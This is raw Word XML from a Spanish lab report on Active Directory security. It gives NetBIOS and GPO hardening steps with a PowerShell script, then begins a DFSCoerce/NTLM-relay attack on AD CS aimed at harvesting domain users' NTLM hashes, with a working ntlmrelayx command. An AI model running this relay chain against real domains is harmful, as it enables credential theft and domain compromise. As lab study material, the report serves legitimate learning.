    <w:p w14:paraId="679F02BD" w14:textId="77777777" w:rsidR="006A3EA4" w:rsidRDefault="006A3EA4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="448181C3" w14:textId="5CD48E9E" w:rsidR="00D222B8" w:rsidRDefault="00D222B8" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>O por GPO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2990CB9F" w14:textId="77777777" w:rsidR="00D222B8" w:rsidRDefault="00D222B8" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58EF3F74" w14:textId="6788DE52" w:rsidR="006A3EA4" w:rsidRDefault="008A6C66" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Primero vamos al administrador del servidor y a administración de directivas de grupo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C41A686" w14:textId="4BFC2E9C" w:rsidR="008A6C66" w:rsidRDefault="008A6C66" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E2E675E" w14:textId="5A08BE28" w:rsidR="00503CC9" w:rsidRDefault="00D222B8" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C73F7B3" wp14:editId="4A602AB8">
            <wp:extent cx="6645910" cy="5704840"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1704466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6114"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5704840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DCB02D" w14:textId="77777777" w:rsidR="00D222B8" w:rsidRDefault="00D222B8" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17DEB7C9" w14:textId="3D58C413" w:rsidR="00D222B8" w:rsidRDefault="00D222B8" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora iremos a Configuración del equipo &gt; Plantillas administrativas -&gt; Red -&gt; Cliente DNS</w:t>
      </w:r>
      <w:r w:rsidR="00B97094">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D528AF" w14:textId="77777777" w:rsidR="00D222B8" w:rsidRDefault="00D222B8" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2110E1A8" w14:textId="020F7128" w:rsidR="00D222B8" w:rsidRDefault="00D222B8" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2574B0C6" wp14:editId="2A3494ED">
            <wp:extent cx="6645910" cy="5327650"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="717971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1239"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5327650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="088A57F8" w14:textId="77777777" w:rsidR="00D222B8" w:rsidRDefault="00D222B8" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="230F88E7" w14:textId="5779348C" w:rsidR="00D222B8" w:rsidRDefault="00D222B8" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Y habilitaremos la opción.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69688ACD" w14:textId="77777777" w:rsidR="00D222B8" w:rsidRDefault="00D222B8" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DEB2458" w14:textId="7588B12B" w:rsidR="00D222B8" w:rsidRDefault="00B97094" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora para deshabilitar NETBIOS sobre TCP/IP tendremos que hacerlo manualmente en cada equipo</w:t>
      </w:r>
      <w:r w:rsidR="00A876D1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1356552F" w14:textId="4C1C1388" w:rsidR="00A876D1" w:rsidRDefault="00A876D1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Parra eso iremos a las propiedades de red y seleccionaremos TCP/IPV4</w:t>
      </w:r>
      <w:r w:rsidR="004C500B">
        <w:t>, opciones avanzadas, WINS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E842D8" w14:textId="77777777" w:rsidR="00D222B8" w:rsidRDefault="00D222B8" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33D716E3" w14:textId="77777777" w:rsidR="00B97094" w:rsidRDefault="00B97094" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="563A9026" w14:textId="77777777" w:rsidR="00B97094" w:rsidRDefault="00B97094" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13CEC399" w14:textId="77777777" w:rsidR="00B97094" w:rsidRDefault="00B97094" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="707131EA" w14:textId="41226F0D" w:rsidR="00B97094" w:rsidRDefault="004C500B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="610B1C0A" wp14:editId="7935E1D5">
            <wp:extent cx="6645910" cy="5327650"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="1154343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3168"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5327650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75375FAA" w14:textId="77777777" w:rsidR="004C500B" w:rsidRDefault="004C500B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7922D6A9" w14:textId="0B21D50C" w:rsidR="004C500B" w:rsidRDefault="004C500B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Y esto </w:t>
      </w:r>
      <w:r w:rsidR="00386103">
        <w:t>está</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> deshabilitado, esto habría que hacerlo en todos los equipos de la red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0312BDED" w14:textId="77777777" w:rsidR="00B97094" w:rsidRDefault="00B97094" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="637E335B" w14:textId="15600486" w:rsidR="0061598F" w:rsidRDefault="0061598F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>También podremos usar un script de inicio de sesión de Powershell, que desactivaría NetBios en los equipos cliente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9DA19C" w14:textId="77777777" w:rsidR="0061598F" w:rsidRDefault="0061598F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B8390EB" w14:textId="500C23FE" w:rsidR="0061598F" w:rsidRPr="0061598F" w:rsidRDefault="0061598F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0061598F">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>$regkey = "HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces" Get-ChildItem $regkey |foreach { Set-ItemProperty -Path "$regkey\$ ($_.pschildname)" -Name NetbiosOptions -Value 2 -Verbose}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6527638D" w14:textId="77777777" w:rsidR="00B97094" w:rsidRDefault="00B97094" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72F4D64D" w14:textId="36E31D05" w:rsidR="00503CC9" w:rsidRDefault="0061598F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lo guardaríamos en una carpeta compartida NETLOGON, después y crearíamos una directiva de </w:t>
      </w:r>
      <w:r w:rsidR="00386103">
        <w:t>inicio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de sesión y añadiríamos el script de Powershell con el parámetro -exec bypass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C63722D" w14:textId="77777777" w:rsidR="0061598F" w:rsidRDefault="0061598F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5971CC1C" w14:textId="17661D7D" w:rsidR="00203209" w:rsidRDefault="007B3349" w:rsidP="007B3349">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc135575986"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Coerce (</w:t>
      </w:r>
      <w:r w:rsidRPr="003B2FCA">
        <w:t>MS-DFSNM</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="6E9EF759" w14:textId="77777777" w:rsidR="00203209" w:rsidRDefault="00203209" w:rsidP="00203209"/>
    <w:p w14:paraId="22F1DD4F" w14:textId="17480D82" w:rsidR="00623839" w:rsidRPr="00203209" w:rsidRDefault="00623839" w:rsidP="00203209">
      <w:r>
        <w:t>El objetivo de este ataque será conseguir todos los hashes NTLM de los usuarios del dominio google.local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A356FB" w14:textId="77777777" w:rsidR="00F51705" w:rsidRDefault="00F51705" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EB327EC" w14:textId="030EC212" w:rsidR="00F51705" w:rsidRDefault="00203209" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Explotaré una vulnerabilidad que </w:t>
      </w:r>
      <w:r w:rsidR="00E76C6F">
        <w:t>utilizando</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> el protocolo remoto del sistema de cifrado de archivos (MS-EFSR) de Microsoft, permitirá la explotación </w:t>
      </w:r>
      <w:r w:rsidR="001F5D84">
        <w:t>a través</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de los servicios de certificados de Active Directory (AD CS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D37A9F" w14:textId="77777777" w:rsidR="00203209" w:rsidRDefault="00203209" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="562800CD" w14:textId="010806A4" w:rsidR="00203209" w:rsidRDefault="00203209" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para esto Usaré DFSCoerce: </w:t>
      </w:r>
      <w:hyperlink r:id="rId132" w:history="1">
        <w:r w:rsidRPr="00BC0C0E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github.com/Wh04m1001/DFSCoerce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373D1BFB" w14:textId="77777777" w:rsidR="00203209" w:rsidRDefault="00203209" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C02E9CD" w14:textId="4B22030D" w:rsidR="00203209" w:rsidRDefault="00203209" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>DFSCoerce apunta al sistema de archivos distribuidos en Windows para forzar la autentificación, pero DFS ni siquiera tiene que estas ejecutándose en el dominio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4C4C5E" w14:textId="77777777" w:rsidR="00203209" w:rsidRDefault="00203209" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A96982C" w14:textId="4C478F31" w:rsidR="00203209" w:rsidRDefault="00203209" w:rsidP="00203209">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="00203209">
        <w:t xml:space="preserve">DFSCoerce hace uso del protocolo MS-DFSNM para forzar que un controlador de dominio </w:t>
      </w:r>
      <w:r w:rsidR="005277B5">
        <w:t>a que se</w:t>
      </w:r>
      <w:r w:rsidRPr="00203209">
        <w:t xml:space="preserve"> autentique contra una máquina controlada por el atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CA1448" w14:textId="77777777" w:rsidR="003B2FCA" w:rsidRDefault="003B2FCA" w:rsidP="00203209">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B758ED8" w14:textId="3D9ADDB1" w:rsidR="003B2FCA" w:rsidRDefault="003B2FCA" w:rsidP="003B2FCA">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="003B2FCA">
        <w:t>Abusa de MS-DFSNM, protocolo que proporciona la capacidad de operar el sistema de archivos distribuido de Windows (DFS) a través de una interfaz de llamada a procedimiento remoto (RPC). Concretamente y por el momento, el método usado es NetrDfsRemoveStdRoot que solo funciona contra los controladores de dominio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D660917" w14:textId="77777777" w:rsidR="003B2FCA" w:rsidRPr="003B2FCA" w:rsidRDefault="003B2FCA" w:rsidP="003B2FCA">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E58B9DB" w14:textId="5E967FA1" w:rsidR="00203209" w:rsidRPr="00203209" w:rsidRDefault="00203209" w:rsidP="00203209">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="00203209">
        <w:t>En esta autenticación se lleva a cabo un ataque de NTLM</w:t>
      </w:r>
      <w:r w:rsidR="003B2FCA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00203209">
        <w:t>relay que permitiría al atacante ganar acceso al dominio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDEF9BA" w14:textId="77777777" w:rsidR="00203209" w:rsidRDefault="00203209" w:rsidP="00203209">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="00203209">
        <w:t>Este ataque funciona de la misma manera que PetitPotam con el protocolo de cifrado MS-EFSRPC, ShadowCoerce con MS-FSRPP o PrinterBug o SpoolSample con MS-RPRN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1930A785" w14:textId="77777777" w:rsidR="001F5D84" w:rsidRDefault="001F5D84" w:rsidP="00203209">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53816456" w14:textId="0DF6AEB7" w:rsidR="001F5D84" w:rsidRDefault="001F5D84" w:rsidP="00203209">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>En este caso intentaremos autentificarnos en el segundo controlador de dominio con la IP 192.168.1.80.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0255E3AA" w14:textId="77777777" w:rsidR="003B2FCA" w:rsidRDefault="003B2FCA" w:rsidP="00203209">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34398786" w14:textId="77777777" w:rsidR="00203209" w:rsidRPr="00203209" w:rsidRDefault="00203209" w:rsidP="00203209">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D3262E0" w14:textId="6ED201E2" w:rsidR="00203209" w:rsidRDefault="008125BC" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Necesitaremos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1223E9" w14:textId="77777777" w:rsidR="008125BC" w:rsidRDefault="008125BC" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="730CC1AB" w14:textId="581EA60F" w:rsidR="008125BC" w:rsidRPr="008125BC" w:rsidRDefault="008125BC" w:rsidP="008125BC">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Coerce</w:t>
      </w:r>
      <w:r w:rsidR="00243608">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00243608">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="rId133" w:history="1">
        <w:r w:rsidR="00243608" w:rsidRPr="00143090">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://github.com/p0dalirius/Coercer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00243608">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE0F126" w14:textId="43752465" w:rsidR="008125BC" w:rsidRDefault="008125BC" w:rsidP="008125BC">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008125BC">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>ntlmrelayx de Impacket</w:t>
      </w:r>
      <w:r w:rsidR="00243608">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="rId134" w:history="1">
        <w:r w:rsidR="00243608" w:rsidRPr="00143090">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:t>https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00243608">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3908A5" w14:textId="45382394" w:rsidR="007D3833" w:rsidRDefault="007D3833" w:rsidP="008125BC">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D3833">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PKINITtools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="rId135" w:history="1">
        <w:r w:rsidR="00243608" w:rsidRPr="00143090">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:t>https://github.com/dirkjanm/PKINITtools</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00243608">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E14A890" w14:textId="342DA565" w:rsidR="0028355C" w:rsidRDefault="0028355C" w:rsidP="008125BC">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Minikerberos -&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="rId136" w:history="1">
        <w:r w:rsidRPr="00143090">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:t>https://github.com/skelsec/minikerberos</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A209DF0" w14:textId="77777777" w:rsidR="008125BC" w:rsidRDefault="008125BC" w:rsidP="008125BC">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="125D325C" w14:textId="181AF3C3" w:rsidR="008125BC" w:rsidRDefault="0097337F" w:rsidP="0097337F">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="0097337F">
        <w:t xml:space="preserve">Comenzamos ejecutando ntlmrelayx , que nos ayudará a transmitir la solicitud de autenticación del servidor AD CS al controlador de dominio y luego responder con la respuesta de autenticación que recibe. Luego podemos capturar el certificado base64 de la cuenta DC$ que envía el servidor AD CS. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B63371A" w14:textId="77777777" w:rsidR="0097337F" w:rsidRDefault="0097337F" w:rsidP="0097337F">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07220799" w14:textId="77777777" w:rsidR="0097337F" w:rsidRDefault="0097337F" w:rsidP="0097337F">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30BB04CA" w14:textId="6384A2C9" w:rsidR="0097337F" w:rsidRDefault="0097337F" w:rsidP="0097337F">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7265E211" wp14:editId="74A4B410">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="76200" r="87630" b="74295"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1909816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30EBDCDC" w14:textId="0AE35490" w:rsidR="0097337F" w:rsidRDefault="007F4577">
                            <w:r w:rsidRPr="007F4577">
                              <w:t>sudo python3 ntlmrelayx.py -t http://192.168.1.79/certsrv/certrqus.asp -smb2support --adcs --template DomainControll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65E211" id="_x0000_s1038" type="#_x0000_t202" style="position:absolute;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&#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Mp5u+q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30EBDCDC" w14:textId="0AE35490" w:rsidR="0097337F" w:rsidRDefault="007F4577">
                      <w:r w:rsidRPr="007F4577">
                        <w:t>sudo python3 ntlmrelayx.py -t http://192.168.1.79/certsrv/certrqus.asp -smb2support --adcs --template DomainController</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1B7ACA" w14:textId="77777777" w:rsidR="0097337F" w:rsidRDefault="0097337F" w:rsidP="0097337F">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28B9EF04" w14:textId="77777777" w:rsidR="0097337F" w:rsidRDefault="0097337F" w:rsidP="0097337F">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A29CEB5" w14:textId="77777777" w:rsidR="0097337F" w:rsidRDefault="0097337F" w:rsidP="0097337F">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75CE9212" w14:textId="77777777" w:rsidR="0097337F" w:rsidRDefault="0097337F" w:rsidP="0097337F">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68963DA4" w14:textId="77777777" w:rsidR="0097337F" w:rsidRDefault="0097337F" w:rsidP="0097337F">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0678B432" w14:textId="7C59F44D" w:rsidR="0097337F" w:rsidRDefault="0097337F" w:rsidP="0097337F">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Siendo -t la </w:t>
      </w:r>
      <w:r w:rsidR="00E25D51">
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> del servidor de certificados:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD4B5F4" w14:textId="77777777" w:rsidR="0097337F" w:rsidRDefault="0097337F" w:rsidP="0097337F">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="323B55FF" w14:textId="7A3AFA5E" w:rsidR="0097337F" w:rsidRDefault="0097337F" w:rsidP="0097337F">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43A3E641" wp14:editId="689D0A7C">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1266945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5799" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D594CA5" w14:textId="77777777" w:rsidR="0097337F" w:rsidRDefault="0097337F" w:rsidP="0097337F">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
